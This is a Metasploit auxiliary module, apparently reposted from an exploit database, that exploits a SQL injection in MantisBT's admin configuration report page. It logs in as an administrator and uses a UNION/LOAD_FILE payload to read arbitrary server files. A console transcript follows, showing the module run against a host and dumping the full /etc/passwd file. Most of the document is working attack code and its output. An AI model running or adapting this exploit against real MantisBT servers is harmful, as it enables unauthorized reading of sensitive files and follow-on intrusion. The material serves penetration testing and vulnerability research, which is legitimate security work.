###########################

# MantisBT Admin SQL Injection Arbitrary File Read

###########################

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "MantisBT Admin SQL Injection Arbitrary File Read",
'Description' => %q{
},
'License' => MSF_LICENSE,
'Author' =>
[
],
'References' =>
[
],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => "Feb 28 2014"))

register_options(
[
OptString.new('FILE', [ true, 'Path to remote file', '/etc/passwd']),
OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
OptString.new('PASSWORD', [ true, 'Single password', 'password']),
OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
], self.class)

end

def run
post = {
'return' => 'index.php',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'secure_session' => 'on'
}

resp = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.php'),
'method' => 'POST',
'vars_post' => post
})

cookie = resp.get_cookies

filepath = datastore['FILE'].unpack("H*")[0]

resp = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'),
'method' => 'POST',
'data' =>
"save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C
11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%2
9%2C11%23&apply_filter_button=Apply+Filter",
'cookie' => cookie,
})


resp.body =~ /qgjuq(.*)qirpq/

file = [$1].pack("H*")
print_good(file)
end
end

__END__
bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo...
the matrix has you
follow the white rabbit.

knock, knock, Neo.

(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`

http://metasploit.pro


=[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1178 exploits - 649 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > use auxiliary/gather/mantisbt_admin_sqli
msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109
RHOST => 172.31.16.109
msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/
TARGETURI => /mantisbt-1.2.16/
msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password
PASSWORD => password
msf auxiliary(mantisbt_admin_sqli) > show options

Module options (auxiliary/gather/mantisbt_admin_sqli):

Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd yes Path to remote file
PASSWORD password yes Single password
Proxies no Use a proxy chain
RHOST 172.31.16.109 yes The target address
RPORT 80 yes The target port
TARGETURI /mantisbt-1.2.16/ yes Relative URI of MantisBT installation
USERNAME administrator yes Single username
VHOST no HTTP server virtual host

msf auxiliary(mantisbt_admin_sqli) > run

[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false
whoopsie:x:106:114::/nonexistent:/bin/false
avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false
saned:x:112:122::/home/saned:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false

[*] Auxiliary module execution completed
msf auxiliary(mantisbt_admin_sqli) > 

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-03-04]

###########################